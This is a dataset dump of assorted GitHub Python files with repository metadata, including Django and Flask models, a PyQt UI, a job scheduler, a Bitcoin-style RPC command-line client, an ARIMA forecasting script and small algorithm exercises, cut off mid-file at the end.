blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1489a49a4e6ccd3697af23f1e682ca9574953838 | efe6c52938fe5c7a259514ad317484057edfeff7 | /tube/models.py | 7526f1fa46150f5b12037f9489d41f329289eb0d | [] | no_license | seiya0723/video_site_02 | 69413879248a2cc314dd5c83c9bedb564e170aba | 5ffcccb1f64b83bb3bf1c9bfd42c9896ff28eb85 | refs/heads/master | 2023-03-31T21:02:25.877950 | 2021-04-14T00:45:14 | 2021-04-14T00:45:14 | 357,728,585 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 438 | py | from django.db import models
from django.utils import timezone
class Video(models.Model):
class Meta:
db_table = "video"
title = models.CharField(verbose_name="タイトル", max_length=30)
comment = models.CharField(verbose_name="動画説明文", max_length=2000)
dt = models.DateTimeField(verbose_name="投稿日", default=timezone.now)
def __str__(self):
return self.title | [
"seiya@asahina"
] | seiya@asahina |
c4df5eb4c623e77ba5bafe17d4482898121c0620 | 2ae9bff6837eb29690d2c8d487af33849abbb56e | /stream_hashtag.py | a0ccf879a6580af099c863d11e4a3c7b50d1dc3b | [] | no_license | hellodk/raspberrypi_applications | c66e486befef06a05e02a8135608688fb8c459a5 | 1548b54284ef3d601ea810e12c1207438f5cf6d0 | refs/heads/master | 2021-01-10T10:42:56.789685 | 2016-04-08T17:42:28 | 2016-04-08T17:42:28 | 55,683,391 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 217 | py | from twython import Twython
c_key = "fjsll123299eeDKMLS"
c_secret = "iX"
A_token = "1Cc"
A_secret = "nlo"
api = Twython(c_key, c_secret, A_token, A_secret)
api.update_status(status="Testing tweets via raspberry pi")
| [
"hello.dk@outlook.com"
] | hello.dk@outlook.com |
ee9601bac1b898b9e6e175b2b2fb865c7ba57fef | 1a3a9de5c55bff88ba61afe5e18d07ce85d8f8f1 | /lyingthepipe/pipe/pipe/asgi.py | 2f507dcdea0d69ea253e7244697556006df127df | [] | no_license | Saurav7373/DjangoPractice | 841c1fe2e1b6a8f8b3cf07694c34993146e2d1d8 | e79ceaf063c4cb7c7ccaf1352e4f9e5ef757951f | refs/heads/master | 2022-09-05T07:22:34.011781 | 2020-05-28T08:42:02 | 2020-05-28T08:42:02 | 267,535,756 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | """
ASGI config for pipe project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'pipe.settings')
application = get_asgi_application()
| [
"dreamsaurav7373@gmail.com"
] | dreamsaurav7373@gmail.com |
0183ca8e3976bb13e783036d8a712cb2463827aa | ea3583a337648c3d92c6aaf0ff501d6b4e27afef | /venv/Designer/demo.py | 853c293703186cac2bb1d4218d7acb62deccbdbb | [] | no_license | hzq1010/python | 5c06bd347fa1b3c405464e2842217536013a1bc7 | ad9b6bc6c3d8bc7a4bd8fb44852bfa78ada9ecf3 | refs/heads/master | 2022-11-23T07:06:04.131601 | 2020-07-28T12:30:01 | 2020-07-28T12:30:01 | 282,894,095 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,523 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'demo.ui'
#
# Created by: PyQt5 UI code generator 5.15.0
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(800, 600)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.pushButton = QtWidgets.QPushButton(self.centralwidget)
self.pushButton.setGeometry(QtCore.QRect(210, 60, 75, 23))
self.pushButton.setObjectName("pushButton")
self.checkBox = QtWidgets.QCheckBox(self.centralwidget)
self.checkBox.setEnabled(True)
self.checkBox.setGeometry(QtCore.QRect(100, 150, 201, 71))
self.checkBox.setMouseTracking(True)
self.checkBox.setCheckable(True)
self.checkBox.setChecked(True)
self.checkBox.setTristate(False)
self.checkBox.setObjectName("checkBox")
self.checkBox_2 = QtWidgets.QCheckBox(self.centralwidget)
self.checkBox_2.setGeometry(QtCore.QRect(100, 260, 131, 61))
self.checkBox_2.setObjectName("checkBox_2")
self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit.setGeometry(QtCore.QRect(100, 210, 113, 20))
self.lineEdit.setObjectName("lineEdit")
self.textEdit = QtWidgets.QTextEdit(self.centralwidget)
self.textEdit.setGeometry(QtCore.QRect(90, 350, 104, 71))
self.textEdit.setObjectName("textEdit")
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.menuBar = QtWidgets.QMenuBar(MainWindow)
self.menuBar.setGeometry(QtCore.QRect(0, 0, 800, 23))
self.menuBar.setObjectName("menuBar")
self.menuFile = QtWidgets.QMenu(self.menuBar)
self.menuFile.setObjectName("menuFile")
MainWindow.setMenuBar(self.menuBar)
self.toolBar = QtWidgets.QToolBar(MainWindow)
self.toolBar.setObjectName("toolBar")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar)
self.actionopen = QtWidgets.QAction(MainWindow)
self.actionopen.setObjectName("actionopen")
self.actionclose = QtWidgets.QAction(MainWindow)
self.actionclose.setCheckable(True)
self.actionclose.setObjectName("actionclose")
self.actionOpen = QtWidgets.QAction(MainWindow)
self.actionOpen.setObjectName("actionOpen")
self.actionClose = QtWidgets.QAction(MainWindow)
self.actionClose.setObjectName("actionClose")
self.menuFile.addAction(self.actionOpen)
self.menuFile.addAction(self.actionClose)
self.menuBar.addAction(self.menuFile.menuAction())
self.toolBar.addSeparator()
self.toolBar.addAction(self.actionclose)
self.toolBar.addAction(self.actionopen)
self.toolBar.addAction(self.actionOpen)
self.toolBar.addAction(self.actionClose)
self.retranslateUi(MainWindow)
self.pushButton.clicked.connect(MainWindow.close)
self.checkBox.toggled['bool'].connect(self.lineEdit.setVisible)
self.checkBox_2.toggled['bool'].connect(self.textEdit.setEnabled)
self.toolBar.actionTriggered['QAction*'].connect(MainWindow.close)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.pushButton.setText(_translate("MainWindow", "关闭窗口"))
self.checkBox.setText(_translate("MainWindow", "显示/隐藏"))
self.checkBox_2.setText(_translate("MainWindow", "可用/不可用"))
self.menuFile.setTitle(_translate("MainWindow", "File"))
self.toolBar.setWindowTitle(_translate("MainWindow", "toolBar"))
self.actionopen.setText(_translate("MainWindow", "open"))
self.actionclose.setText(_translate("MainWindow", "close"))
self.actionclose.setShortcut(_translate("MainWindow", "Ctrl+F"))
self.actionOpen.setText(_translate("MainWindow", "Open"))
self.actionClose.setText(_translate("MainWindow", "Close"))
| [
"1546111923@qq.com"
] | 1546111923@qq.com |
95754c0f8dfaeb8b76f2ed013793d5e533646b0d | 10fd11cbc666cae31750dfae5042fc2cd24b2239 | /functions.py | c0cbef1e42767861f2366ccc94459578147a51bf | [] | no_license | amacuga/python-fundamentals | 705b1f08648ed3255cd9915d354ef7aa0ee7f15b | a0b04fe6b061ee4a230e27e2362efb2784204cb4 | refs/heads/master | 2020-07-30T07:33:16.830181 | 2019-10-05T09:25:22 | 2019-10-05T09:25:22 | 210,136,835 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 161 | py | def gcd(a, b):
"""
Returns the greates conmmon divisor of a and b.
"""
while b > 0:
a, b = b, a % b
return a
print(gcd(50, 20))
print(gcd(22,143)) | [
"sasenah@gmail.com"
] | sasenah@gmail.com |
5a3f537ce2ab77a4a0a06f433c56ac5b16ef1f92 | df1b5d8ac3bb100aa2b4367868090d1cb73913df | /Graph/POLY.py | 5ccc8f96dc58b39f8f9e6ad1149776e133acb63b | [] | no_license | ace26597/EE-629-Project_Augmented-Reality-based-Smart-Manufacuturing | fb4d6d0920013c1b53ef9990a855bcb74a078122 | 80f78bb3424300bc8204ed350877769dc1dcf995 | refs/heads/main | 2023-02-07T22:59:11.081963 | 2021-01-03T01:39:47 | 2021-01-03T01:39:47 | 315,432,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,804 | py | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from statsmodels.tsa.arima_model import ARIMA
import warnings
import pmdarima as pm
warnings.filterwarnings("ignore")
df = pd.read_csv('data.csv',usecols=['2.Signal Value'], header=0)
dataset=pd.read_csv("data.csv")
pred_time = dataset.iloc[-1]["1.Time"]
pred_time = pred_time + 50
new_time = [[pred_time]]
print(pred_time)
model = pm.auto_arima(df.values, start_p=1, start_q=1,
test='adf', # use adftest to find optimal 'd'
max_p=3, max_q=3, # maximum p and q
m=1, # frequency of series
d=None, # let model determine 'd'
seasonal=False, # No Seasonality
start_P=0,
D=0,
trace=True,
error_action='ignore',
suppress_warnings=True,
stepwise=True)
print(model.summary())
model.plot_diagnostics(figsize=(7,5))
plt.show()
# Forecast
n_periods = 50
fc, confint = model.predict(n_periods=n_periods, return_conf_int=True)
index_of_fc = np.arange(len(df.values), len(df.values)+n_periods)
# make series for plotting purpose
fc_series = pd.Series(fc, index=index_of_fc)
last_element = fc_series[-1:]
pred_value = last_element[pred_time]
lower_series = pd.Series(confint[:, 0], index=index_of_fc)
upper_series = pd.Series(confint[:, 1], index=index_of_fc)
# Plot
plt.plot(df.values)
plt.plot(fc_series, color='darkgreen')
plt.fill_between(lower_series.index,
lower_series,
upper_series,
color='k', alpha=.15)
plt.title("Final Forecast of WWW Usage")
plt.show() | [
"noreply@github.com"
] | ace26597.noreply@github.com |
7cb1a76b11e459e1fe780a925cfd1457361cf753 | 9fe1d131029ea41d60c66f5ff534111f3b3859ae | /pycharm/0630/__init__.py | 2ef0303bb70956908d89a36e02401704178cd0e3 | [
"Apache-2.0"
] | permissive | jsqwert/ML-Class | 1cc5765503df74cefa122e416c67333b4d360442 | 276c052bbe37914c289391d0d2d1be03e471086d | refs/heads/master | 2020-03-22T12:39:57.953921 | 2018-08-08T02:11:39 | 2018-08-08T02:11:39 | 140,054,160 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 64 | py | # -- encoding:utf-8 --
"""
Create by ibf on 2018/6/30
"""
| [
"js@ubuntu.com"
] | js@ubuntu.com |
bfba43a40c44ed33df829ed9cd1755d9c69e70f7 | 736250d9d14552c5fa0aca25b25d9c8a28fcd1a0 | /sssionpro/manage.py | 3b9b39fa5263b2fcca0a11cb1b35b13a433a6d39 | [] | no_license | maheswatapradhan/feedback | 57f052a2082902cb8a72b474e0b863b7a00d1c9c | 31c7dcb113a38e29b3a56481fcb9ae2fce7d61a2 | refs/heads/master | 2020-09-15T23:42:32.041306 | 2019-11-23T12:54:25 | 2019-11-23T12:54:25 | 223,585,900 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "sssionpro.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"test@test.com"
] | test@test.com |
c552b68dcdfe5c44e43fb68048e7f0f839981b74 | 0992ee279da802595290be9110aa91580d19fded | /scheduler/scheduler.py | 5e8da48454ba1e909e07557ccef372c4aa9830ef | [] | no_license | shakob/job_scheduler | 0e7248251b2c24309304a9869ab1dce7a6fe996b | 431c85383dd05025701cbd6245c429176f4fcacf | refs/heads/master | 2020-07-24T06:56:50.863292 | 2019-09-11T14:52:43 | 2019-09-11T14:52:43 | 207,830,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,660 | py | #!/usr/bin/python3
import time
from functools import partial, update_wrapper
from threading import Lock, Thread, Event
from typing import List
from scheduler import TimeUnitEnum, Logger, JobTypeEnum, ThreadSafeCounter
from scheduler.job import Job, JOB_FACTORY
from scheduler.thread_pool import ThreadPool
__all__ = ["Scheduler", "TestingScheduler"]
class Scheduler(Thread):
"""
Scheduler class:
- Thread: Runs forever until joined
-
"""
def __init__(self, max_jobs: int):
Thread.__init__(self, name="Scheduler", daemon=False)
self._list_jobs: List[Job] = []
self._jobs_lock = Lock()
self._keep_running = Event()
self._keep_running.set()
self._thread_pool = ThreadPool(size=max_jobs)
self.time_unit = TimeUnitEnum.HOURS
def __len__(self):
"""
:return: Size of thread pool
:rtype: int
"""
return len(self._thread_pool)
def get_status(self):
dict_result = {"time_unit": self.time_unit,
"is_running": self._keep_running.is_set(),
"jobs": [job.get_status() for job in self._list_jobs]}
return dict_result
def _pre_run(self):
pass
def _post_run(self):
pass
def run(self):
"""
Runs forever until joined
:return:
"""
self._thread_pool.start()
Logger.info("Scheduler Start")
while self._keep_running.is_set():
self._pre_run()
self._run_pending()
time.sleep(1)
self._post_run()
Logger.info("Scheduler Stopped")
def join(self, timeout=None):
self._keep_running.clear()
self._thread_pool.stop()
return super().join(timeout=timeout)
def _run_pending(self):
"""
Run pending jobs that should run
- Should run:: current time > Job's scheduled time
- Put each job in job queue of thread pool
- Checks that each Job can continue to the next run
"""
with self._jobs_lock:
list_jobs_to_iterate = self._list_jobs
Logger.info(str(list_jobs_to_iterate))
list_jobs_to_run = []
list_remaining_jobs = []
for job in list_jobs_to_iterate:
if job.should_run:
list_jobs_to_run.append(job)
else:
list_remaining_jobs.append(job)
with self._jobs_lock:
self._list_jobs = list_remaining_jobs
list_jobs_to_run = [job for job in list_jobs_to_iterate if
job.should_run]
list_jobs_to_run = sorted(list_jobs_to_run)
list_threads = [Thread(target=self._thread_pool.run,
kwargs={"func": job.run_job},
daemon=True)
for job in list_jobs_to_run]
for job_thread in list_threads:
job_thread.start()
for job_thread in list_threads:
job_thread.join()
for job in list_remaining_jobs:
if not job.can_continue():
job.cleanup()
for job in list_jobs_to_run:
if job.can_continue():
with self._jobs_lock:
self._list_jobs.append(job)
else:
job.cleanup()
def add_job(self, interval: int, job_type: JobTypeEnum, *args, **kwargs):
job = JOB_FACTORY(job_type)
j = job(interval=interval, time_unit=self.time_unit, *args, **kwargs)
with self._jobs_lock:
self._list_jobs.append(j)
Logger.info("Add a new Job: {}, interval: {} {}"
.format(j.job_id, interval, self.time_unit.value))
return j
@staticmethod
def _get_partial(func, *args, **kwargs):
job_func = partial(func, *args, **kwargs)
try:
update_wrapper(job_func, func)
except AttributeError:
# job_funcs already wrapped by partial won't have
# __name__, __module__ or __doc__ and the update_wrapper()
# call will fail.
pass
return job_func
class TestingScheduler(Scheduler):
def __init__(self, max_jobs: int):
Scheduler.__init__(self, max_jobs=max_jobs)
self.time_unit = TimeUnitEnum.SECONDS
self._cycles = ThreadSafeCounter()
def _pre_run(self):
self._cycles.next()
def _post_run(self):
pass
@property
def cycles(self):
"""
:return: Number of cycles scheduler has made
:rtype: int
"""
return self._cycles.value
| [
"bhaa.shakur@gmail.com"
] | bhaa.shakur@gmail.com |
021b662c27ba46b313b47cd2438ac8fae908f865 | ebbce9a6fbbf736a756987ba32d09c6084097d54 | /contrib/bitrpc/bitrpc.py | 132114cdf29d8a5b7ff082d5fc11ced856aaee96 | [
"MIT"
] | permissive | growaleaf/castle-master | 548d1c7132c4dfa34e0e4dac9a787a801e77dd9e | a8226db6a12f9b384cb700a2d2b64191d057d708 | refs/heads/master | 2018-12-24T23:42:10.219762 | 2018-11-14T15:35:54 | 2018-11-14T15:35:54 | 108,199,615 | 2 | 2 | MIT | 2018-10-17T22:18:03 | 2017-10-25T00:36:12 | C++ | UTF-8 | Python | false | false | 7,835 | py | from jsonrpc import ServiceProxy
import sys
import string
# ===== BEGIN USER SETTINGS =====
# if you do not set these you will be prompted for a password for every command
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======
if rpcpass == "":
access = ServiceProxy("http://127.0.0.1:2222")
else:
access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:2222")
cmd = sys.argv[1].lower()
if cmd == "backupwallet":
try:
path = raw_input("Enter destination path/filename: ")
print access.backupwallet(path)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccount":
try:
addr = raw_input("Enter a Bitcoin address: ")
print access.getaccount(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
try:
acct = raw_input("Enter an account name: ")
print access.getaccountaddress(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
try:
acct = raw_input("Enter an account name: ")
print access.getaddressesbyaccount(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getbalance":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getbalance(acct, mc)
except:
print access.getbalance()
except:
print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
try:
height = raw_input("Height: ")
print access.getblockbycount(height)
except:
print "\n---An error occurred---\n"
elif cmd == "getblockcount":
try:
print access.getblockcount()
except:
print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
try:
print access.getblocknumber()
except:
print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
try:
print access.getconnectioncount()
except:
print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
try:
print access.getdifficulty()
except:
print "\n---An error occurred---\n"
elif cmd == "getgenerate":
try:
print access.getgenerate()
except:
print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
try:
print access.gethashespersec()
except:
print "\n---An error occurred---\n"
elif cmd == "getinfo":
try:
print access.getinfo()
except:
print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
try:
acct = raw_input("Enter an account name: ")
try:
print access.getnewaddress(acct)
except:
print access.getnewaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaccount(acct, mc)
except:
print access.getreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
try:
addr = raw_input("Enter a Bitcoin address (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaddress(addr, mc)
except:
print access.getreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "gettransaction":
try:
txid = raw_input("Enter a transaction ID: ")
print access.gettransaction(txid)
except:
print "\n---An error occurred---\n"
elif cmd == "getwork":
try:
data = raw_input("Data (optional): ")
try:
print access.gettransaction(data)
except:
print access.gettransaction()
except:
print "\n---An error occurred---\n"
elif cmd == "help":
try:
cmd = raw_input("Command (optional): ")
try:
print access.help(cmd)
except:
print access.help()
except:
print "\n---An error occurred---\n"
elif cmd == "listaccounts":
try:
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.listaccounts(mc)
except:
print access.listaccounts()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaccount":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaccount(mc, incemp)
except:
print access.listreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaddress(mc, incemp)
except:
print access.listreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "listtransactions":
try:
acct = raw_input("Account (optional): ")
count = raw_input("Number of transactions (optional): ")
frm = raw_input("Skip (optional):")
try:
print access.listtransactions(acct, count, frm)
except:
print access.listtransactions()
except:
print "\n---An error occurred---\n"
elif cmd == "move":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.move(frm, to, amt, mc, comment)
except:
print access.move(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendfrom":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendfrom(frm, to, amt, mc, comment, commentto)
except:
print access.sendfrom(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendmany":
try:
frm = raw_input("From: ")
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.sendmany(frm,to,mc,comment)
except:
print access.sendmany(frm,to)
except:
print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
try:
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
amt = raw_input("Amount:")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendtoaddress(to,amt,comment,commentto)
except:
print access.sendtoaddress(to,amt)
except:
print "\n---An error occurred---\n"
elif cmd == "setaccount":
try:
addr = raw_input("Address: ")
acct = raw_input("Account:")
print access.setaccount(addr,acct)
except:
print "\n---An error occurred---\n"
elif cmd == "setgenerate":
try:
gen= raw_input("Generate? (true/false): ")
cpus = raw_input("Max processors/cores (-1 for unlimited, optional):")
try:
print access.setgenerate(gen, cpus)
except:
print access.setgenerate(gen)
except:
print "\n---An error occurred---\n"
elif cmd == "settxfee":
try:
amt = raw_input("Amount:")
print access.settxfee(amt)
except:
print "\n---An error occurred---\n"
elif cmd == "stop":
try:
print access.stop()
except:
print "\n---An error occurred---\n"
elif cmd == "validateaddress":
try:
addr = raw_input("Address: ")
print access.validateaddress(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
try:
pwd = raw_input("Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60)
print "\n---Wallet unlocked---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
try:
pwd = raw_input("Enter old wallet passphrase: ")
pwd2 = raw_input("Enter new wallet passphrase: ")
access.walletpassphrasechange(pwd, pwd2)
print
print "\n---Passphrase changed---\n"
except:
print
print "\n---An error occurred---\n"
print
else:
print "Command not found or not supported" | [
"growcoindev@gmail.com"
] | growcoindev@gmail.com |
97774fa976928bdcf6c4009c0ca72bc7c085ddb9 | 0b2a5df3447b7427b6da3705513de2b825792222 | /djangoproject/sinbike/common/migrations/0001_initial.py | f6c59f355e63a3b384c99ae7bd4e33f259c9fa37 | [] | no_license | youtube-dm94/Sinbike | 7599af3c4673bcd95ea1aa56fdd68b4cfb0f8b5f | 69afcb86a9dcb30951bdc01f596c7e27a54b332b | refs/heads/main | 2023-07-12T11:59:52.491953 | 2021-08-14T08:30:42 | 2021-08-14T08:30:42 | 362,273,684 | 0 | 2 | null | 2021-08-03T16:17:13 | 2021-04-27T22:56:46 | Python | UTF-8 | Python | false | false | 538 | py | # Generated by Django 2.2.14 on 2021-07-18 22:09
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='FAQ',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('postname', models.CharField(max_length=100)),
('contents', models.TextField()),
],
),
]
| [
"63930715+youtube-dm94@users.noreply.github.com"
] | 63930715+youtube-dm94@users.noreply.github.com |
0c53f056baf2fa290d4e7d68c3b61e3cca4bbc49 | b6fb31ec8a26b744f0add5db61cc7296dd4308fa | /classes/A Methodical Approach.py | e60639847b2b1bbd139b8a1c7f8788a7c94f4ea0 | [] | no_license | Jump1556/codecademy | cfbc102f2a01dac199e0e6d625a7745cc2689e4f | 0dbb0fa6a34885ce645c30ec066499de0fbb4af4 | refs/heads/master | 2021-01-02T23:10:45.852090 | 2017-08-25T11:40:43 | 2017-08-25T11:40:43 | 99,484,076 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 376 | py | class Animal(object):
is_alive = True
health = "good"
def __init__(self, name, age):
self.name = name
self.age = age
# Add your method here!
def description(self):
print self.name
print self.age
hippo = Animal("Ivo",2)
sloth = Animal("Iva",3)
ocelot = Animal("Ivi",1)
hippo.description()
print (hippo.health)
print (sloth.health)
print (ocelot.health)
| [
"noreply@github.com"
] | Jump1556.noreply@github.com |
84e52527a928f7d432a3d31e2f8adb3e799e8143 | 0b3fc937dab7e9cf8242355eec4849728b97e7be | /.vscode/desviocondicional.py/ex5.py | dd3e14a41a78b5f75d905ced99cb4bd7a5a2c9ae | [] | no_license | ElielMendes/Exercicios-da-Faculdade-e-projeto-de-Numerologia-Karmica | 090796ee0ba6f7ed25bce1094b0276b3f910b0ce | 9667f793b0f3243176ddb911d6f82a9d77c042da | refs/heads/main | 2023-04-12T05:43:12.515763 | 2021-05-19T23:37:06 | 2021-05-19T23:37:06 | 362,498,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 271 | py | n1 = int(input("digite um número inteiro: "))
if (n1%10) == 0:
print("número divisivel por 10 ")
elif (n1%5) == 0:
print("número divisivel por 5 ")
elif (n1%2) == 0:
print("número divisivel por 2 ")
else:
print("número não divisivel por 10, 5 e 2") | [
"eliel.oliveira@aluno.faculdadeimpacta.com.br"
] | eliel.oliveira@aluno.faculdadeimpacta.com.br |
e5c3105a3f2f825626898ed2c619b599f820a0e9 | f1a8e308c76866e2fba20401e6f1d5842dd60c46 | /Algorithms and Data Structures Practice/LeetCode Questions/Greedy/TieRopes.py | 0ca4144df73641761d8095f25ec57753846b4744 | [] | no_license | harman666666/Algorithms-Data-Structures-and-Design | 6e5da0c1f701e7dfc7b045ecd1209463131d3fc7 | 483f0c93faca8ccaf038b77ebe2fa712f6b0c6bc | refs/heads/master | 2021-07-14T10:11:27.588838 | 2021-07-07T01:47:42 | 2021-07-07T01:47:42 | 101,330,760 | 3 | 1 | null | 2018-10-15T04:52:07 | 2017-08-24T19:32:03 | Python | UTF-8 | Python | false | false | 2,234 | py | '''
There are N ropes numbered from 0 to N − 1, whose lengths are given in an array A, lying on the floor in a line. For each I (0 ≤ I < N), the length of rope I on the line is A[I].
We say that two ropes I and I + 1 are adjacent. Two adjacent ropes can be tied together with a knot, and the length of the tied rope is the sum of lengths of both ropes. The resulting new rope can then be tied again.
For a given integer K, the goal is to tie the ropes in such a way that the number of ropes whose length is greater than or equal to K is maximal.
For example, consider K = 4 and array A such that:
A[0] = 1
A[1] = 2
A[2] = 3
A[3] = 4
A[4] = 1
A[5] = 1
A[6] = 3
The ropes are shown in the figure below.
We can tie:
rope 1 with rope 2 to produce a rope of length A[1] + A[2] = 5;
rope 4 with rope 5 with rope 6 to produce a rope of length A[4] + A[5] + A[6] = 5.
After that, there will be three ropes whose lengths are greater than or equal to K = 4. It is not possible to produce four such ropes.
Write a function:
def solution(K, A)
that, given an integer K and a non-empty array A of N integers, returns the maximum number of ropes of length greater than or equal to K that can be created.
For example, given K = 4 and array A such that:
A[0] = 1
A[1] = 2
A[2] = 3
A[3] = 4
A[4] = 1
A[5] = 1
A[6] = 3
the function should return 3, as explained above.
Write an efficient algorithm for the following assumptions:
N is an integer within the range [1..100,000];
K is an integer within the range [1..1,000,000,000];
each element of array A is an integer within the range [1..1,000,000,000].
'''
# you can write to stdout for debugging purposes, e.g.
# print("this is a debug message")
def solution(K, A):
'''
Identify ropes that are smaller,
than K, and merge them together.
but dont merge with a rope that is already greater than K.
Or just look at first rope, if its less than K,
merge with right one,
'''
sum = 0
count = 0
for i in A:
if (sum + i) >= K:
count += 1
sum = 0
else:
sum += i
return count
| [
"harman.j.singh@hotmail.com"
] | harman.j.singh@hotmail.com |
88d8b4b02ec11ac221e79dfa1c21f25d8e3f2cfc | 1ff94dfea8fc7d350d0b60b2a3c96a7eca44fe50 | /backend/models.py | 473f7a115d8b3f07e878ea26cb012629644d8dae | [] | no_license | MohamedKhaledRamadan/Trivia | 94be9826f1c9c29156ca4bb6122245ab5361fec9 | a35e0fc68ebcbae99d41d533ef20b83f4566a03a | refs/heads/master | 2023-02-03T00:41:54.213545 | 2020-12-17T12:06:07 | 2020-12-17T12:06:07 | 321,483,321 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,635 | py | import os
from sqlalchemy import Column, String, Integer, create_engine
from flask_sqlalchemy import SQLAlchemy
import json
database_name = "trivia"
database_path = "postgres://{}/{}".format('postgres:01110931793@localhost:5432', database_name)
db = SQLAlchemy()
'''
setup_db(app)
binds a flask application and a SQLAlchemy service
'''
def setup_db(app, database_path=database_path):
app.config["SQLALCHEMY_DATABASE_URI"] = database_path
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
db.app = app
db.init_app(app)
db.create_all()
'''
Question
'''
class Question(db.Model):
__tablename__ = 'questions'
id = Column(Integer, primary_key=True)
